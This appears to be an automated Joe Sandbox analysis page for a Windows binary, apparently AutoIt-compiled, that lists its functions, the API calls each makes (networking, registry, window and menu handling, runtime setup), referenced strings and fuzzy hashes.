Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5072fcb26043cb1b90b85d01c622910e6aa55846dc82aef5feb1cc45d63c2fc7
Instruction ID: 792a87f4e859696c2d051eddd3edc8cd6a38fba40dc8ac51e7f9662b01d4634c
Opcode Fuzzy Hash: 5072fcb26043cb1b90b85d01c622910e6aa55846dc82aef5feb1cc45d63c2fc7
Instruction Fuzzy Hash: 1A219536B00219AFDF10EFA8DD84CBB73ECEB09360B1585A6F914DB264DA749C418B64

Function 00B86173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B87DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B861C6
WSAGetLastError.WSOCK32(00000000), ref: 00B861D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B8620E
connect.WSOCK32(00000000,?,00000010), ref: 00B86217
WSAGetLastError.WSOCK32 ref: 00B86221
closesocket.WSOCK32(00000000), ref: 00B8624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B86263

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 69d66448ff7a66de2650d9ec2ea10aba801795f4d4809804fcd12e57a4a02131
Instruction ID: bc5cdca049d3028f23021e0011d6f9faa48b1abc3962a6e55ee63b49056ac163
Opcode Fuzzy Hash: 69d66448ff7a66de2650d9ec2ea10aba801795f4d4809804fcd12e57a4a02131
Instruction Fuzzy Hash: F0318D31600108ABDB10AF64CC89BBE7BE8EF45765F0440A9F905E72A1DB74AD44CBA1

Function 00B68E90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B6AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B68F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B68F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B68F57

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

Strings

ComboBox, xrefs: 00B68E9E
@U=u, xrefs: 00B68F14, 00B68F27, 00B68F57
ListBox, xrefs: 00B68ED3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: @U=u$ComboBox$ListBox
API String ID: 365058703-2258501812
Opcode ID: d3d914eee0fed66d7cf33f9cdd4318838198796a91f9b847da3f2d210a8ad589
Instruction ID: d820c290b187524f00766203e7e3722e324d85ffd80aa42088cdc8d638144a84
Opcode Fuzzy Hash: d3d914eee0fed66d7cf33f9cdd4318838198796a91f9b847da3f2d210a8ad589
Instruction Fuzzy Hash: 9921F271A44104BEDB14ABB09C85DFFB7F9DF05360B1046AAF421A71E0DF394849DA20

Function 00B6F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B6F671
__wcsnicmp.LIBCMT ref: 00B6F692
__wcsnicmp.LIBCMT ref: 00B6F6AC

Strings

#notrayicon, xrefs: 00B6F669
#OnAutoItStartRegister, xrefs: 00B6F6A6
#requireadmin, xrefs: 00B6F68C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: f876da43604d9662e60848a2256eb2564f07438752cae53b65d3413bc80e88b2
Instruction ID: 8da366ccbe3efec202b2018052608643a1f9d0ca05ddedc44d286b86b7ec50d7
Opcode Fuzzy Hash: f876da43604d9662e60848a2256eb2564f07438752cae53b65d3413bc80e88b2
Instruction Fuzzy Hash: 492138B224552366D220BB38FC03EB773D8EF5A750F6444B9F846860A1EB599D82C3A5

Function 00B6B1EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B6B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B6B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B6B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B6B27F
_wcsstr.LIBCMT ref: 00B6B289

Strings

@U=u, xrefs: 00B6B221, 00B6B259

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID: @U=u
API String ID: 3902887630-2594219639
Opcode ID: 3e10bbce381ee9c1fa7fefb1d33a1c803656c438b6c1fbe876c4e35e854e0c26
Instruction ID: b26be25c90450eacbdacefed7777c8d216f73a768fff884b0f296857ea286873
Opcode Fuzzy Hash: 3e10bbce381ee9c1fa7fefb1d33a1c803656c438b6c1fbe876c4e35e854e0c26
Instruction Fuzzy Hash: 862125322042117BEB156B359C59E7F7FECDF49720F1041BAF805DA161EF65DC809660

Function 00B69307 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B69320

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B69352
__itow.LIBCMT ref: 00B6936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B69392
__itow.LIBCMT ref: 00B693A3

Strings

@U=u, xrefs: 00B69320, 00B69352, 00B69392

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID: @U=u
API String ID: 2983881199-2594219639
Opcode ID: 4b2a8c954305b98494332c0a9411abeca07fba5481c5ab48947e8951fab870be
Instruction ID: 83c0890e164d9a4caadc63214985404ac83cae45b4f4589cef7cdda20f4c041f
Opcode Fuzzy Hash: 4b2a8c954305b98494332c0a9411abeca07fba5481c5ab48947e8951fab870be
Instruction Fuzzy Hash: 0121F231701208BBDB10AB608D89EEE3BECEB48B20F0440A5F905DB2D0DAB48D558795

Function 00B975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B11D73
Part of subcall function 00B11D35: GetStockObject.GDI32(00000011), ref: 00B11D87
Part of subcall function 00B11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B11D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B97632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B9763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B9764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B97659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B97665

Strings

Msctls_Progress32, xrefs: 00B97603

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 57f97135f61ae68b084db89ce07174704547b0875a2f086567fe114c7283bbb9
Instruction ID: 4a9c6a8aff1d3f5413175c385a28b54609905ae4ded44aa5bbdb11763990ae20
Opcode Fuzzy Hash: 57f97135f61ae68b084db89ce07174704547b0875a2f086567fe114c7283bbb9
Instruction Fuzzy Hash: 441198B1150219BFEF159F64CC85EE77F9DEF08798F114125BB44A6060CB729C21DBA4

Function 00B39AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00B39AE6

Part of subcall function 00B33187: EncodePointer.KERNEL32(00000000), ref: 00B3318A
Part of subcall function 00B33187: __initp_misc_winsig.LIBCMT ref: 00B331A5
Part of subcall function 00B33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B39EA0
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B39EB4
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B39EC7
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B39EDA
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B39EED
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B39F00
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B39F13
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B39F26
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B39F39
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B39F4C
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B39F5F
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B39F72
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B39F85
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B39F98
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B39FAB
Part of subcall function 00B33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B39FBE

__mtinitlocks.LIBCMT ref: 00B39AEB
__mtterm.LIBCMT ref: 00B39AF4

Part of subcall function 00B39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B39AF9,00B37CD0,00BCA0B8,00000014), ref: 00B39C56
Part of subcall function 00B39B5C: _free.LIBCMT ref: 00B39C5D
Part of subcall function 00B39B5C: DeleteCriticalSection.KERNEL32(00BCEC00,?,?,00B39AF9,00B37CD0,00BCA0B8,00000014), ref: 00B39C7F

__calloc_crt.LIBCMT ref: 00B39B19
__initptd.LIBCMT ref: 00B39B3B
GetCurrentThreadId.KERNEL32 ref: 00B39B42

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 2191ea57ed585deda92cf474a199425b861934980f0dbf2deb00d1220fcb38fd
Instruction ID: 5ff350c844f8c68b3de04856fd29802699586d79e1922e29aec908b9faadfd33
Opcode Fuzzy Hash: 2191ea57ed585deda92cf474a199425b861934980f0dbf2deb00d1220fcb38fd
Instruction Fuzzy Hash: 3BF0B4326097115AE6347778BC03A4B76D1DF02730F300AEAF560D60D2FFF0984141A0

Function 00B3406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B33F85), ref: 00B34085
GetProcAddress.KERNEL32(00000000), ref: 00B3408C
EncodePointer.KERNEL32(00000000), ref: 00B34097
DecodePointer.KERNEL32(00B33F85), ref: 00B340B2

Strings

RoUninitialize, xrefs: 00B34074
combase.dll, xrefs: 00B34080

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 444aab57eedeb88a85aa53b3bf0542697e5511d77040118518d8cede391f0151
Instruction ID: dc372ba7f76dd46591df501c1a3902cdd584147077f58bfa7a8e3298d38c65f3
Opcode Fuzzy Hash: 444aab57eedeb88a85aa53b3bf0542697e5511d77040118518d8cede391f0151
Instruction Fuzzy Hash: 1DE0927068A202ABEA10AF65EE19B157BE5BB04B52F204076F101F30B2DFB696048A16

Function 00B764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B7660B
_memmove.LIBCMT ref: 00B76546

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

_memmove.LIBCMT ref: 00B765B9
_memmove.LIBCMT ref: 00B766A0
_memmove.LIBCMT ref: 00B766B9
_memmove.LIBCMT ref: 00B766D5

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
Instruction ID: 9c4ec6689774e153d02aec717a6164f8d48e7e2132ca2d05ceb94193ea1eb5d2
Opcode Fuzzy Hash: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
Instruction Fuzzy Hash: 84618C3090069A9BCF11FF60CC91EFE37E5AF05308F8485A9F8695B192DB35EA45CB50

Function 00B901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8FDAD,?,?), ref: 00B90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B902BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B902FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B90320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B90349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B9038C
RegCloseKey.ADVAPI32(00000000), ref: 00B90399

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 7abbd197d773e4fb1ddf7fbdac53aec85e3a4712ce0c7ae2fb90df988e75fd52
Instruction ID: 7c406bb319765f1ac1968d02baeb328a4cba0481ce4df03c2c94903d4fe4ec03
Opcode Fuzzy Hash: 7abbd197d773e4fb1ddf7fbdac53aec85e3a4712ce0c7ae2fb90df988e75fd52
Instruction Fuzzy Hash: 63515A31218205AFCB10EF64C885EAFBBE9FF89314F4449ADF455872A2DB31E945CB52

Function 00B95799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B957FB
GetMenuItemCount.USER32(00000000), ref: 00B95832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B9585A
GetMenuItemID.USER32(?,?), ref: 00B958C9
GetSubMenu.USER32(?,?), ref: 00B958D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B95928

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 62f663a005ab4cfb9d985bdf3e54a0daadff35162f8178e9b19dc60a4a897958
Instruction ID: ec439eb7cb6e5efabf1ae1fccb3f1733d675e3ce27be58656790ee3e85ff1d58
Opcode Fuzzy Hash: 62f663a005ab4cfb9d985bdf3e54a0daadff35162f8178e9b19dc60a4a897958
Instruction Fuzzy Hash: 79513B31E00615AFCF11EF64C895AAEBBF4EF48720F1040A9E856AB351CB74AE418B90

Function 00B6EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B6EF06
VariantClear.OLEAUT32(00000013), ref: 00B6EF78
VariantClear.OLEAUT32(00000000), ref: 00B6EFD3
_memmove.LIBCMT ref: 00B6EFFD
VariantClear.OLEAUT32(?), ref: 00B6F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B6F078

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 68fa62316701b4b5c4ec1cf5af15a06eb036b9dd58545225475362e56ff7680c
Instruction ID: 11368206c2cf00a32a22539a9809c63e6447f5884db645f60c5547a086b4decb
Opcode Fuzzy Hash: 68fa62316701b4b5c4ec1cf5af15a06eb036b9dd58545225475362e56ff7680c
Instruction Fuzzy Hash: 4D516D75A0020ADFDB14CF58D880AAAB7F8FF4C314B15856AE959DB301E734E911CB90

Function 00B7220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B722A3
IsMenu.USER32(00000000), ref: 00B722C3
CreatePopupMenu.USER32 ref: 00B722F7
GetMenuItemCount.USER32(000000FF), ref: 00B72355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B72386

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: b05490bacba48807c33bd3bcc191d54f86cb45a4d779038bd905d234e260c979
Instruction ID: 67a1e1ef85c7078ae3b71830e2ce1e502436729b189f377e16ca11e4c766da00
Opcode Fuzzy Hash: b05490bacba48807c33bd3bcc191d54f86cb45a4d779038bd905d234e260c979
Instruction Fuzzy Hash: 8651D230A0424ADFDF21CF68C988BADBBF5FF05314F11C2A9E86997291D7748904CB55

Function 00B11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00B1179A
GetWindowRect.USER32(?,?), ref: 00B117FE
ScreenToClient.USER32(?,?), ref: 00B1181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B1182C
EndPaint.USER32(?,?), ref: 00B11876

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: ed847f103c1c4b304e451298fba245c9e0fa679daffce0b7cbb73a7f26ae91ae
Instruction ID: 2082b40e02b57eaa661160d91ac13449cc39ab60192f87983f586ee04061018f
Opcode Fuzzy Hash: ed847f103c1c4b304e451298fba245c9e0fa679daffce0b7cbb73a7f26ae91ae
Instruction Fuzzy Hash: 0A41A171104701AFD720DF28DC84FBA7BE8EB45724F1446A9F6A4C72B1DB319885EB61

Function 00B8709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B84E41,?,?,00000000,00000001), ref: 00B870AC

Part of subcall function 00B839A0: GetWindowRect.USER32(?,?), ref: 00B839B3

GetDesktopWindow.USER32 ref: 00B870D6
GetWindowRect.USER32(00000000), ref: 00B870DD
